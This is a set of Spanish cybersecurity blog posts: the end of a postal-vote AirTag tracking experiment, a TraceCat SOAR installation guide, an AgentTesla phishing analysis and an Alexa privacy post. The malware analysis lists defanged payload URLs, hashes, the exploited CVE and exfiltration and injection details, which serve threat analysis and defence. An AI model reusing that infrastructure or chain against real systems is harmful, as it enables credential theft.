oficina , en la que , a priori, no debería haber personal trabajando, más allá del horario establecido. ¿ Podría haberse alterado el voto ? , por supuesto que si . Que no quiere decir, y reitero, que se haga, pero se podría hacer con mucha tranquilidad de querer hacerlo. [Imagen: Mapa a las 6:26 mostrando que el voto se vio por última vez ayer] ### Viernes 7 de Junio a las 15:16 Las imágenes cuentan con la captura de la hora exacta, pero cortaré algunas con el fin de que sea un poco estético y no con imágenes tan largas. A las 15:16 , parece que nuestro voto se disponía a viajar, ya que paró a repostar en la gasolinera . Algo que también nos hizo pensar, ¿ que tipo de trazabilidad tiene en viaje nuestro voto ?¿ que impide hacer el cambio en el trayecto ? , la respuesta, es igual que la anterior, nada [Imagen: Mapa del voto por correo en la Avenida Federico Molina de Huelva hace 12 minutos] [Imagen: Gasolinera Hipercor Huelva] ### Viernes 7 de Junio a las 15:50 La primera para tras repostar , fue en unos almacenes de logística de correos Express, donde se da una situación similar , posiblemente alarmado, pero sin mayor seguridad. Ya estamos en viaje hacia el destino. [Imagen: Mapa del voto por correo en la Avenida de la Gamba de Huelva hace 24 minutos] Oficinas que cuentan con 1,3 de valoración de un total de 275 reseñas. Viendo esto, la preocupación es que no llegase ;) . [Imagen: Alarma Correos Express] ### Viernes 7 de Junio a las 18:18 Dado que a partir de aqui se puso en transito, el seguimiento no podía ser tan continuo. En una furgoneta , si el conductor no tenía iPhone ( Como es el caso ) , debería parar en alguna retención cerca de alguno , o en sus paradas tener un dispositivo cerca. Lo que si sabemos, es que paso por Sevilla a recoger más cosas, ya que podría haber tirado directamente a Madrid si no. [Imagen: Localizaciones SE30 Sevilla] Como el AirTag da la última localización si no es posible localizarlo por no tener dispositivos cerca , me da dos ubicaciones en Sevilla en la SE30 . Supongo , que por ir a otro Correos Express o alguna oficina central. Tras verlo en Sevilla , prosiguió su viaje a Madrid. En Sevilla hizo una parada de algo más de una hora , ya que se le vio a las 19:41 también por la SE30: [Imagen: Visto por última vez en Sevilla] ### Sábado 8 de Junio a las 00:41 Y llego el Sábado, y con ello, el voto llego a Madrid. Sobre las 3:00 de la madrugada consulté la ubicación , dándome este punto como ultima referencia: [Imagen: Mapa de Madrid con el voto por correo visto por última vez a las 0:41] Creo que en Madrid es complicado no "cruzarse" con otro iPhone, por lo que posiblemente, el siguiente medio de transporte sea el aéreo, ¿ Por qué no ? . De Sevilla a Madrid creo que no se dio, ya que la dirección de la furgoneta no era la adecuada , pero podría darse que desde Madrid se reparta a distintas capitales de provincia y que estas la repartan de nuevo en furgoneta. La suposición viene , por la cercanía de la última posición del AirTag al Aeropuerto de Cuatro Vientos. [Imagen: Mapa señalando con una flecha el aeropuerto de Madrid-Cuatro Vientos junto a la A-5] ### Sábado 8 de Junio a las 07:32 Nos despertamos con una grata sorpresa, nuestro voto por correo, ha continuado su camino y ya se encuentra en Valladolid. No lo había dicho anteriormente, pero el voto va un pequeño pueblecito de Segovia del cual soy. Cuando os trasladaba lo del avión, es posible que ciertas capitales de provincia hagan de punto neurálgico, y que desde estas viajen vía terrestre a través de furgonetas a los distintos puntos, como veremos continuación. [Imagen: Mapa de Valladolid con el voto por correo en la Calle del Aluminio hace 39 minutos] Un ejemplo, es la cantidad de furgonetas y hangares que captó Google Street View: [Imagen: Street View de la sede de Correos en Valladolid con furgonetas amarillas señaladas] ### Sábado 8 de Junio a las 11:48 A algo menos de 24 horas, el voto por correo ya estaba a tan solo 5 km de su destino, en la Oficina de Correos de Arévalo, donde pasaría toda la noche , previa a la recepción por parte del presidente de la mesa electoral. [Imagen: Mapa con el voto por correo situado en Arévalo, Ávila, hace 34 minutos] ### Domingo 9 de Junio a las 13:00 Finalmente el voto llego a mi pequeñito pueblo, tras pasar por la vivienda del personal de correos ( Estamos hablando de un entorno rural ). Curiosamente , como el voto no estaba alterado , marchado, dañado o similar , y para mi sorpresa, pasó por la ranura de la urna , el voto terminó contando. Esta vez, si hemos podido comprobar que nuestro voto fue el que estaba en la mesa electoral, pero como hemos podido comprobar a lo largo del post, podría no haber llegado. La suplantación del voto por correo, podría haberse dado en cualquier punto con suma facilidad. Recordamos que es un sobre dentro de otro. Que al ciudadano , no se le da muestra ninguna de que el voto llego correctamente , que no se le muestra trazabilidad .... [Imagen: Mapa con el voto por correo detenido en Donhierro, Segovia, hace 26 minutos] ### Implicaciones de comprobar que el voto por correo no cumple la cadena de custodia. Como os comentaba al inicio del post, el mismo podría haber tenido una serie de implicaciones o problemas legales hacia mi persona. Anterior a remitir el voto, se estuvo sopesando posibles problemas que pudiesen surgir incluso a nivel legal con abogados: - Según el artículo 23.1 de la Constitución Española,”los ciudadanos tienen el derecho a participar en los asuntos públicos, directamente o por medio de representantes, libremente elegidos en elecciones periódicas por sufragio universal.” Esto hace que el derecho a voto sea un derecho constitucional, por ello las dudas que nos surgieron y que podrían haber supuesto un problema era que se diesen este tipo de situaciones: - Correos, dispone de sistemas de vigilancia sobre los paquetes remitidos. la verdad que no teníamos certeza de que fuese a llegar el voto por correo. uno de los supuestos era que dichas alarmas saltasen al localizar un elemento electrónico en algo tan delicado como un voto. ( Nos ha sorprendido que esto no se controlase tampoco, ya que podría dar opción a situaciones mucho más peligrosas ) - Si se hubiese interceptada, por haber visto algún tipo de aparato electrónico en el voto, lo primero que posiblemente hubiesen supuesto las fuerzas y cuerpos del Estado es que podría tratarse de algún tipo de aparato peligroso o explosivo. - Dado que el derecho a voto , es un derecho constitucional. Muy posiblemente, se debería haber pedido una orden judicial para abrir el mismo. realizando además algún tipo de grabación para atestigular el momento de apertura. Cuestiones que no eran fáciles de responder, ya que no se han dado en otras situaciones. Estábamos ante un caso de estudio perfecto en cualquier asignatura de la universidad de derecho. - Esta situación podría darse en cualquiera de los puntos, que os he ido relatando a lo largo del Post, por lo que tampoco sabríamos cómo se podría llegar a actuar, si hubiésemos abierto el voto, supongo que vendrían a medir me cuentas a Mi Casa las fuerzas y cuerpos del estado. Por suerte, el voto por correo ha llegado a su destino, y aunque el mismo será nulo, hemos podido cerciorarnos de nuestra suposiciones, sin a día de hoy, tener ningún tipo de repercusión legal. ### Conclusiones Hemos podido verificar que el voto por correo no es seguro, que no cumple la cadena de custodia de cada ciudadano, y que podría darse una suplantación del mismo en cualquier momento. Por parte del Correos, podría trasladarse que sí que existe una cadena de custodia y que existe una trazabilidad de por dónde pasa ese voto en cada una de los puntos en los que para, pero esto no implica que no pudiese llegarse a cambiar. En la época en la que estamos, que es inaudito, que estemos hablando de inteligencia artificial, y que estemos realizando el voto por un simple correo postal. es imprescindible que, en caso de querer continuar con esta metodología, el ciudadano sepa en todo momento dónde está su voto, y claro está, que el mismo no haya sido modificado, por ejemplo: - Sería tan sencillo como pasar los mismos por un sistema en cada una de esas estaciones, en las que para, y remitir una imagen del mismo en la que se viese, que más allá del remitente escrito en la parte trasera, se observase una firma plasmada en el propio cierre del sobre. - O por ejemplo, que afirmarse con su certificado digital, la persona que recoge los votos en cada uno de los puntos de parada u oficinas, haciéndose el mismo responsable. - Si esto fuese muy complicado, podría ceñirse el sistema, a que el presidente de la mesa electoral anterior abrir el sobre, remita una foto del mismo, esto daría ciudadano una certeza de que el sobre no ha sido manipulada a priori. Y claro esta, y hacia donde deberíamos ir. debería tener la capacidad de poder votar mediante voto electrónico, el mismo día de la propiedad votación. ¿ no consideráis que deberíamos gastarnos algo de los más de 140.000 millones de euros de digitalización, para digitalización este sistema ? Espero que este estudio haya merecido la pena, y sobre todo, que os haya gustado, aunque como os haya dicho antes haya "arriesgado mi culo". --- # TraceCat, SOAR OpenSource con mucho potencial URL: https://ciberseguridad.blog/descubriendo-tracecat-un-soar-opensource-con-mucho-potencial/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-06-02 Actualizado: 2026-10-08 Tema: Laboratorios de ciberseguridad > Automatizar nuestro SOC, es más que obligatorio. Veamos como poder hacerlo con herramientas SOAR OpenSource. ¿Te imaginas poder investigar un correo electrónico de phishing en tan solo 15 minutos? Éstas y otras tareas son principalmente las que automatizan y realizan las herramientas SOAR, orquesta capaces de realizar tareas que manualmente nos llevarían muchísimo más tiempo y que nos ayudan a minimizar los mismos y quitar acciones manuales que pueden generar problemas humanos. Como todos sabéis, básicamente porque os vengo hablando de ellas desde el 2018, para mí este tipo de herramientas de orquestación / automatización , serán el punto de inflexión y diferenciación en la evolución de los SOC, demostrando un beneficio que está empezando a consolidarse. Por ello, hoy os vengo hablar de un proyecto SOAR OpenSource , que creo que, puede tener un amplio recorrido. No tan potente como Apache NiFi , el cual tenía un amplio recorrido en transformación de datos, si no mucho más orientado al mundo de las ciberseguridad, como es el proyecto TraceCat En tan solo 15 minutos, como os indicaba, ( y de una forma gratuita - Aunque tiene versión Cloud "luego hablamos de ella" ) esta poderosa herramienta puede recibir un correo sospechoso, extraer las URLs utilizando ChatGPT, solicitar un informe de phishing a URL scan, etiquetar el correo como malicioso o no mediante análisis de sentimiento de IA, y almacenar todas las evidencias recolectadas para una investigación más profunda en un caso. ¿Quieres saber cómo instalar, usar y aprovechar al máximo el potencial de Tracecat? En este post, te guiaremos paso a paso a través de sus funcionalidades, mostrando cómo esta herramienta puede convertirse en tu aliada perfecta si estas empezando con SOAR y no puedes permitirte algo de pago. ## Instalando el SOAR Tracecat Como podéis ver el vídeo y explicaremos posteriormente Tracecat tiene una muy fácil instalación, que posiblemente nos ayude a dar el paso de probar la herramienta. Pero no solo eso, sino que aparte dispone de un entorno Cloud, actualmente abierto para registrarnos y sobre el que podremos realizar todas nuestras pruebas. Puesto que queríamos hacer pruebas con el fin de conocer su funcionamiento con datos de producción, motivado también por su fácil instalación, nos lanzamos a crear una instancia en local, siguiendo las instrucciones : El vídeo que acompañaba a este apartado ya no está disponible en YouTube. Lo primero que hicimos fue montar un servidor Ubuntu 20.04 , sobre el que procederíamos a instalar los requisitos que nos marcan para poder empezar, que son : Siempre , lo primero del todo, es actualizar el entorno: sudo apt update - Docker (Docker Engine v20.10+) 1. Eliminar versiones antiguas: sudo apt-get remove docker docker-engine docker.io containerd runc 1. Configurar el repositorio: ```sudo sudo apt-get install \ ca-certificates \ curl \ gnupg \ lsb-release ``` 1. Agregar la clave GPG oficial de Docker: curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg 1. Configurar el repositorio estable: ```echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \ $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null ``` 1. Instalar Docker Engine ```sudo sudo apt-get install docker-ce docker-ce-cli containerd.io ``` Y voila! , ya tenemos Docker instalado . Os dejo la prueba del delito de que soy tan friki que aquí ando un Sábado a las 8 de la mañana haciendo un post :) . [Imagen: Instalación Docker] Ahora continuamos con : - Docker Compose (Compose V2) Docker Compose V2 se distribuye como un plugin de Docker, por lo que vamos a ello. 1. Descargamos el plugin: ``` mkdir -p ~/.docker/cli-plugins/ curl -SL https://github.com/docker/compose/releases/download/v2.5.1/docker-compose-linux-x86_64 -o ~/.docker/cli-plugins/docker-compose ``` 1. Damos permisos de ejecución al plugin: ``` chmod +x ~/.docker/cli-plugins/docker-compose ``` 1. Verificar la instalación de Docker Compose: ``` docker compose version ``` [Imagen: Docker Compose] - Docker Desktop Docker Desktop no está disponible para Linux de la misma manera que para Windows o macOS, ya que Docker Desktop incluye Docker Engine y Docker Compose. En un entorno de servidor Linux como el nuestro, generalmente solo se instalan Docker Engine y Docker Compose. Sin embargo, podemos instalar Portainer como una alternativa para la gestión visual de contenedores Docker. ``` docker volume create portainer_data docker run -d -p 8000:8000 -p 9000:9000 --name=portainer \ --restart=always \ -v /var/run/docker.sock:/var/run/docker.sock \ -v portainer_data:/data \ portainer/portainer-ce ``` - ngrok 1. Descargamos el binario de ngrok: ``` wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip ``` 1. Descomprimimos el archivo descargado: ``` unzip ngrok-stable-linux-amd64.zip ``` 1. Movemos el binario a /usr/local/bin: sudo mv ngrok /usr/local/bin/ngrok 1. Verificamos Version ngrok --version [Imagen: Version Ngrok] - pnpm (with Node v20+) 1. Instalar Node.js (usaremos nvm para gestionar la versión de Node.js): curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.1/install.sh | bash source ~/.bashrc nvm install 20 1. Instalar pnpm: npm install -g pnpm 1. Verificar la instalación de pnpm: pnpm --version [Imagen: ppm version] Con estos pasos, ya dispondremos de los requisitos para empezar a instalar TraceCat y habremos instalado Docker Engine, Docker Compose, una alternativa para Docker Desktop, ngrok y pnpm con Node.js v20 en nuestro servidor Ubuntu. Empezamos clonando el repositorio de TraceCat: ``` git clone git@github.com:TracecatHQ/tracecat.git --branch engine-0.1.0 cd tracecat ``` He instalando las dependencias: ``` cd frontend pnpm install ``` Ahora continuamos con las variables de entorno. Para configurar manualmente las variables de entorno, copiamos el archivo .env.example para crear un archivo .env: cp .env.example .env Tendremos que reemplazar las variables de entorno que comienzan con your-.* con nuestros propios valores, para ello se recomienda en la web, usar env.sh. El script env.sh ejecuta comandos para configurar la clave de cifrado de la base de datos, la clave del servicio API y el secreto de firma del webhook por nosotros, algo que nos facilitará mucho la vida: ``` chmod +x env.sh bash env.sh ``` Nos pedirá que ingresemos la URL pública del Runner, la clave de API de OpenAI y la clave de API de Resend. Si prefieres proporcionar estos valores más tarde, puedes omitir cada paso del prompt presionando Enter. Si utilizas ngrok, la URL del Runner debería tener la forma https://.ngrok-free.app. Por mi parte , os recomiendo ngrok, y asi lo vamos a hacer: Visita ngrok y crea una cuenta. > ngrok es una herramienta poderosa que te permite exponer un servidor local detrás de un NAT o firewall a Internet. Accede al panel de control de ngrok y crea un nuevo dominio estático gratuito. ngrok te ofrece 1 dominio estático gratuito, lo cual es perfecto para proyectos de desarrollo. El dominio debe tener el formato .ngrok-free.app. Por ejemplo, si tu dominio ngrok es tu-dominio-ngrok.ngrok-free.app, puedes iniciar ngrok ejecutando el siguiente comando: ``` ngrok http --domain=tu-dominio-ngrok.ngrok-free.app 8001 ``` Si prefieres no utilizar un dominio estático, puedes optar por un dominio efímero gratuito ejecutando: ngrok http http://localhost:8001 Al enlazar ngrok al puerto 8001 en tu máquina host, las solicitudes entrantes del webhook se redirigen automáticamente al contenedor Runner. Por ello, asegúrate de que tu archivo .env contenga la siguiente línea: TRACECAT__RUNNER_URL=https://tu-dominio-ngrok.ngrok-free.app Con estos pasos, habremos configurado ngrok correctamente para nuestro proyecto TraceCat, permitiendo una integración fácil y segura de webhooks y otras funcionalidades dependientes de una URL accesible públicamente. Esto ya es un problema más que conocido, pero si estás utilizando Linux, este es un problema conocido que puede afectar la comunicación entre contenedores y el host.es al no poder resolver host.docker.internal desde dentro de los contenedores Docker. Para solucionar este problema, podemos agregar el siguiente parámetro a cada uno de los servicios en nuestro archivo docker-compose.yaml. Una solución recomendada por múltiples fuentes como StackOverflow. ``` services: api: build: . container_name: api ports: - "8000:8000" volumes: - ./tracecat:/app/tracecat - app-storage:/var/lib/tracecat environment: API_MODULE: "tracecat.api.app:app" # Shared LOG_LEVEL: ${LOG_LEVEL} RABBITMQ_URI: ${RABBITMQ_URI} TRACECAT__APP_ENV: ${TRACECAT__APP_ENV} TRACECAT__DB_ENCRYPTION_KEY: ${TRACECAT__DB_ENCRYPTION_KEY} TRACECAT__DB_URI: ${TRACECAT__DB_URI} TRACECAT__SERVICE_KEY: ${TRACECAT__SERVICE_KEY} TRACECAT__SIGNING_SECRET: ${TRACECAT__SIGNING_SECRET} TRACECAT__API_URL: ${TRACECAT__API_URL} TRACECAT__RUNNER_URL: ${TRACECAT__RUNNER_URL} # Auth CLERK_FRONTEND_API_URL: ${CLERK_FRONTEND_API_URL} TRACECAT__DISABLE_AUTH: ${TRACECAT__DISABLE_AUTH} # Integrations OPENAI_API_KEY: ${OPENAI_API_KEY} restart: unless-stopped depends_on: rabbitmq: condition: service_healthy networks: - internal-network extra_hosts: - "host.docker.internal:host-gateway" # Do the same for the rest of the services # ... ``` Y ya estaríamos en disposición de levantar TraceCat: docker compose up La interfaz de Tracecat debería estar ejecutándose en el puerto 3000. Para acceder a la interfaz, simplemente abre tu navegador web y dirígete a http://localhost:3000. No es necesario crear una cuenta para uso local, lo que facilita la configuración y pruebas iniciales. Tracecat también ofrece acceso a sus servidores de API y runner a través de los puertos 8000 y 8001, respectivamente. Estos servidores permiten una interacción avanzada y gestión de procesos. • Documentación de la API: Puedes ver la documentación completa de la API en http://localhost:8000/docs. Esta documentación es esencial para integrar y utilizar las funciones de la API de Tracecat de manera eficiente. • Documentación del Runner: Para obtener información sobre el servidor runner, visita http://localhost:8001/docs. Aquí encontrarás guías y referencias necesarias para ejecutar y gestionar tareas con el runner de Tracecat. [Imagen: Instalación TraceCat] ## Sin escusas para probarlo Hemos visto como poder instalar nuestro propio SOAR en local, cuestión que recomiendo , como habéis visto por la facilidad de instalación , y por que no permitirá diseñar un entorno productivo mucho más real. Pero si por tiempo o por comodidad no podemos, TraceCat nos lo pone muy fácil, estando ahora mismo en fase Alpha , permitiéndonos crear una cuenta en la plataforma Cloud que tienen a coste 0. Esto, nos permitiria ahorrarnos la instalación, lo que nos deja sin excusas , si queremos probar la automatización en nuestro SOC. [Imagen: Instancia Cloud SOAR TraceCat] ## Desgranando SOAR TraceCat Uno de los puntos que más me ha llamado la atención de TraceCat, es la facilidad de uso que tiene. Algo muy similar a PowerAutomate de Microsoft y en concordancia con otros SOAR Nada más entrar en la plataforma, lo primero que nos vamos a encontrar es un listado de todos nuestros Workflows, y donde claro esta también está el botón nuevos para poder crearlos. [Imagen: Creación de Workflows SOAR TraceCat] Una vez dentro, nos encontraremos con una plataforma muy sencilla de utilizar como trasladaba antes. Diferenciada esta en tres partes principales. Por un lado, ( 1 ) tendremos las acciones y las integraciones. Como punto negativo trasladar que a día de hoy, como se trata de un proyecto en fase Alfa, el número de integraciones es bastante reducido, algo que no podremos comparar con soluciones como XSOAR de Palo Alto, que tiene una inmensidad de ellas. Recordad que esto es una solución OpenSource , aun que a futuro posiblemente tenga un mínimo coste. [Imagen: Interfaz de TraceCat mostrando el editor de flujos de trabajo con un nodo Webhook] Por el lado de las acciones, considero que tiene la gran mayoría para poder trabajar de una forma automática, con la transformación de datos, extracción de URL, elecciones, sumamatizaciones ... Como veíamos con el ejemplo de Crowdstrike y Apache NIFI , también podíamos hacerlo, pero de una forma un poco más enrevesada. Uno de los puntos que he visto más interesantes en la plataforma ( 2 ) , es que como resultado de análisis de nuestro workflow, podemos realizar la apertura de casos, para su posterior análisis por interacción humana, por ejemplo. esto lo hace complemento perfecto para los SOC , más pequeños o incluso una pequeña empresa sin capacidades, o cualquiera que quiera realizar un traje mínimo de posibles afecciones de seguridad. Y por último ( 3 ), la configuración de las acciones que queramos realizar. Yo soy un friki de Power Automate , y he de trasladaros, que la plataforma es super intuitiva, en la que se ha adoptado lo mejor de distintas plataformas de automatización. ### Ejemplo de automatización con SOAR TraceCat Os podría traer algún ejemplo como los que vimos de Crowdstrike , pero creo que el ejemplo que han desarrollado ellos es muy bueno, y da una visión de las capacidades que puede prestar TraceCat a entidades sin mucho peso / inversión en ciberseguridad. [Vídeo: Basics - Use AI to automate phishing email investigations](https://www.youtube.com/watch?v=xl2qxce8Xw8) Un autentico descubrimiento, sobre el que seguro que oiremos hablar mucho. Algo muy reciente , sobre lo que me he querido adelantar y traéroslo , y sobre el que veremos grandes avances próximamente. Espero que disfrutéis con TraceCat, tanto como lo estoy haciendo yo. --- # AgenTesla en otro phishing del Banco Santander URL: https://ciberseguridad.blog/agentesla-en-otro-phising-del-banco-santander/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2024-04-21 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Stealer más que conocido, que ahora acecha en phishing del Banco Santander , intentando robar información del navegador. ¡ CUIDADO ! Hola a tod@s!! He visto este correo proveniente del ¿Banco Santander? ¡Claro que no! Veamos de qué se trata : Any.run [Imagen: Any.run AgenTesla Santander] Si nos fijamos en las detecciones, nos indica que se trata de AgentTesla, sin embargo, no nos muestra la configuración del malware. [Imagen: AgenTesla sin configuración] Aparecen referencias a un exploit, cve-2017-11882, pero antes de llegar a él, partiremos del fichero Excel que vemos como adjunto pero antes de eso, ¿os habéis fijado en el dominio del correo de procedencia? [Imagen: Alberto Huerta Banco Santander] Nada que ver con el Banco Santander, ¿verdad? Eso ya debería hacer que se desconfíe del correo, además de otros parámetros de seguridad que podemos ver en la cabecera del correo. [Imagen: Campos SPF . DKIM , DMARC] Si veis que en los campos asociados a SPF, DKIM o DMARC aparece fail, entonces estaremos ante un Phishing o Spam. Os recuerdo algo sobre estas cabeceras de ciberseguridad de email : - Sender Policy Framework (SPF): Autenticación de Servidores de Correo El SPF es una técnica esencial en la defensa contra el phishing. Permite verificar que los servidores enviando correos en nombre de un dominio están previamente autorizados por dicho dominio. Cuando un correo electrónico es recibido, el sistema comprueba si procede de un servidor que coincide con las políticas SPF establecidas en los registros DNS del dominio del remitente. Un fallo en esta comprobación es a menudo señal de un intento de suplantación de identidad, alertando sobre la posible falsedad del mensaje. - DomainKeys Identified Mail (DKIM): Firmando Digitalmente para la Seguridad DKIM añade una capa de seguridad al firmar digitalmente los correos en el servidor de origen. Esta firma es luego verificada contra una clave pública alojada en los registros DNS del dominio del remitente por el servidor receptor. Un correo que llegue sin una firma DKIM válida o con discrepancias en la verificación de la firma sugiere una manipulación potencial del mensaje, elevando las sospechas de actividad fraudulenta. - Domain-based Message Authentication, Reporting, and Conformance (DMARC): Integración y Conformidad DMARC amplifica la efectividad de SPF y DKIM al establecer una política clara que los servidores de correo pueden utilizar para manejar correos que no pasen estas validaciones. Ayuda a los administradores a decidir cómo tratar los correos que fallan en estas pruebas, como rechazarlos o marcarlos como sospechosos. La no conformidad con la política DMARC de un dominio es un indicativo claro de que el correo podría ser parte de un ataque de phishing, proporcionando así una herramienta poderosa para la protección de la información. La combinación de un resultado "softfail" en SPF y un resultado "fail" en DMARC, junto con la falta de firma DKIM, sugiere que el correo electrónico podría ser considerado como spam o como potencialmente malicioso. [Imagen: Phising Banco Santander] Ahora sí, vamos al adjunto. Según la sandbox tenemos la descarga de una URL desde Excel : h[tt]p://198.12.81[.]144/xlamkissedmewithgreatresultstounderstandthefeelingofloverkiisingtomewithlipstoget__suchatruelovermetounderstand.doc [Imagen: Descarga de Malware Banco Santander] ¿Es un fichero de Word? [Imagen: Fichero Malicioso Ejecutable] No, es un fichero RTF, que será abierto con Microsoft Word. [Imagen: Malware Visual Basic VBS] Este será el que aproveche la vulnerabilidad mencionada anteriormente y descargue un fichero VBS llamado forxlam.vbs ubicado en el mismo servidor web que el fichero anterior RTF : h[tt]p://198.12.81[.]144/forxlam.vbs Este script ejecuta un comando Powershell como puede verse a continuación. [Imagen: Script Malicioso PowerShell] Utilizamos Cyberchef para obtener el resultado del comando. [Imagen: Análisis de Malware con Cyberchef] Vemos referencias a un par de imágenes (¿iguales?) en las cuales se esconde algún código base64. [Imagen: Imagen AgenTesla con Malware] Hay unos tag de inicio y fin de código base64: <> y <>. Una de ellas no contiene el código base64 esperado, la otra sí. [Imagen: BASE64_START Y BASE64_END] El contenido una vez tratado, es una DLL que se encargará de poner en memoria el malware final, que sale de la URL que se encuentra al revés: h[tt]p://198.12.81[.]144/siscopbaze6444444444maincleanrdppppp.txt Esta URL contiene código base64 al revés, el cual trataremos. [Imagen: Inverse Base64] - Filename: siscopbaze6444444444maincleanrdppppp.exe - md5: 51b25cb304a840acb014f48414fa1130 - sha1: 4ddc549405e9467e06e7b8e5efa99ea0bd337132 - sha256:3ac7c6799414c1fe18dc8e355833651a85e73b443df78f6870293a2266483093 - imphash: f34d5f2d4577ed6d9ceec516c1f5a744 Después de pasarle el De4dot podemos tener acceso más legible al código fuente del malware y, por consiguiente, a su configuración. [Imagen: Análisis De4dot] La exfiltración se produce vía FTP a ese dominio que se ve en la captura anterior. [Imagen: Ip del FTP de Exfiltración de AgenTesla] La inyección se produce en el proceso AddInProcess32.exe, como veíamos en el comando que se estaba ejecutando. [Imagen: proceso de infección AddInProcess32.exe] Aunque no sacase la configuración de AgentTesla, sí que dio en el clavo, por lo tanto, bien por Any.run. Espero que os haya gustado y nos vemos en el siguiente POST. ¡¡Hasta otra!! --- # Alexa nos espía en el teletrabajo URL: https://ciberseguridad.blog/alexa-nos-espia-en-el-teletrabajo/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-04-07 Actualizado: 2026-10-08 Tema: Compliance > Alexa nos escucha más de lo que pensamos durante la jornada de teletrabajo. Modifica tus políticas de ciberseguridad y bloquea almacenar !YA¡ Hace uno días , vi en un Tiktok , como poder solicitar todos los audios de nuestro Alexa a Amazon. Algo que me alertó notablemente, ya que yo dispongo de uno, en el lugar donde muchas veces paso casi mi día completo trabajando. Tras hacer una ardua tarea de lectura de políticas y normativas de ciberseguridad, sobre puesto de trabajo, teletrabajo, uso corporativo de los dispositivos, y un largo etcetera, no llegue a encontrar ni una minima sugerencia al respecto de la recomendación para evitar este tipo de dispositivos en los entornos de teletrabajo. > Tras haber encontrado, lo que os voy a contar a lo largo del post, seguro que al menos os genera inquietud. ( Audios incluidos ) Ni mucho menos soy lo minimamente importante o divertido para que Amazon o un tercero intente espiarme, pero tal vez, esto si pase con las personas estratégicamente y los VIPs de nuestra empresa. Perfiles con un alto grado de confidencialidad, que tal vez no lo tengan como yo en su mesa, pero puedan disponer de alguno en alguna habitación. Os dejo mi Setup: Por muy buen audio que el Echo tenga, me veo obligado a rescindir su contrato :) [Imagen: Setup de teletrabajo] ## Como solicitar audios alexa El proceso para acceder a esta valiosa información es sorprendentemente sencilla y accesible para cualquier usuario de Amazon, siguiendo estos pasos: No solo podéis solicitar los datos de Alexa , os pongo el enlace para ser más directos, si no podeis seguir los pasos: - Accede a Amazon: Puedes hacerlo directamente desde su sitio web o mediante la aplicación móvil. - Navega a ‘Mi cuenta’: Aquí encontrarás el perfil de tu cuenta de Amazon. - Busca la opción ‘Gestionar tus datos’: Desliza hacia abajo hasta encontrar este apartado y selecciona ‘Solicitar tus datos’. [Imagen: Solicitud de datos Alexa] - Elige ‘Dispositivos Alexa y Echo’: Entre las diversas opciones de información que Amazon recopila sobre nosotros, debemos seleccionar esta para centrarnos en los datos recogidos por tus dispositivos Alexa. [Imagen: Texto de Amazon detallando qué datos guarda sobre los dispositivos Alexa y Echo] 1. Envía tu solicitud: Con un simple clic en ‘Enviar solicitud’, iniciarás el proceso. Amazon puede requerir una verificación adicional, y en mi caso, me envio un enlace de confirmación por correo electrónico. Este paso asegura que realmente seas tú quien solicita acceso a estos datos. Tras esto, Amazon nos advierte que puede tardar hasta un mes en compilar y proporcionar toda la información solicitada ( Entiendo que si solicitamos todos los datos ), la realidad es que en mi caso tardo solo 3 días, pero es tanta la información que manda , que he tardado mucho en procesarla. Pero, ¿qué tipo de información puedes esperar recibir? Además de las grabaciones de voz, el archivo enviado por Amazon incluirá detalles como el número de serie de tu dispositivo Alexa, información sobre las redes Wi-Fi a las que se ha conectado, .... entre otros datos relevantes. Este ultimo me pareció una bomba también. Si Amazon tiene nuestras direcciones y nuestras redes , podría hacer hacer publicidad dirigida por proveedores y zonas ;) Puede parecer que este procedimiento refleja la transparencia de Amazon respecto a la gestión de los datos personales de los usuarios, pero, como veremos , el dispositivo, no solo graba cuando escucha "alexa" . ¿ Esta vulnerando la privacidad ? El dispositivo no solo graba a su propietario, quien consiente este uso de datos .... podríamos dar una vuelta a todo esto y abrir un amplio debate. ## Que audios tiene Alexa de mi Tras solicitar los audios de mis Alexa a Amazon, a los tres días, recibí un mail de descarga que me permitía descargarme los datos: [Imagen: Correo de Amazon avisando que los datos personales solicitados están listos para descargar] Descargarme la friolera de 1,27 Gb de Audios (wav) en su gran mayoría. Tenia mucho trabajo por delante, para ver que podría tener Amazon de mi: [Imagen: Panel de información de macOS mostrando la carpeta ALEXA con 1,27 GB de datos] Si desgranamos la carpeta que nos remitió Amazon , a corto plazo, nos centraremos en los bloques que os señalo, donde podemos ver ya una primera parte de casi 2500 audios. En mi casa dispongo de 2 Alexas, por lo que por ello os indica Alexa_1 / 2 , centrándonoslas en el número 2, que es el que os muestro en mi escritorio. [Imagen: Alexa nos espia] Unido a las carpetas con todos los audios, y como podéis ver por el nombre de la carpeta padre, Amazon también nos remite varios .csv con la transcripción de todos los audios, tiempos y respuestas de Alexa. Algo muy valioso que me ha servido para quitar el "ruido" y buscar las anomalías en todo esto que nos manda Amazon de nuestros Alexa: [Imagen: Archivo CSV con transcripciones literales de comandos de voz grabados por Alexa] Como aporte de continuidad aterradora, trasladaros que del Alexa_1 me remitieron casi 10K de audios , haciendo un total de 12040 audios ( Muchos audios para mejorar la calidad del servicio ) [Imagen: Explorador de macOS mostrando 9547 archivos de audio grabados por dispositivos Alexa] ## Analizando los Audios que Alexa tiene de mi y viendo si me espía en el teletrabajo. Dado que Amazon me había remitido más de 12K audios , me resultaba complicado analizarlos con el fin de ver si había "algo raro" en ellos, por lo que decidí poner el foco en las transcripciones que Amazon nos remite. Si os fijáis en la carpeta de Alexa_2 , vienen dos .csv con las transcripciones , en la que tras confirmarlo, os traslado que vienen las transcripciones de ambas carpetas de audios. Con el asombro, y tras un rato observando el documento de transcripción, decidí empezar el estudio por varios puntos que me llamaron la atención: [Imagen: Tipos de archivos remitidos por Amazon] El que me llamas la atención principalmente , pero sobre el que poco podemos hacer, más allá de especular, es el que en todos los campos tiene "Data Not Available" ( 1 ) , ¿que quiere decir exactamente? , ¿Amazon ha borrado de sus sistemas los archivos ?¿o simplemente no nos los manda?¿que ha visto? ¿ Por que lanzo estas preguntas ? 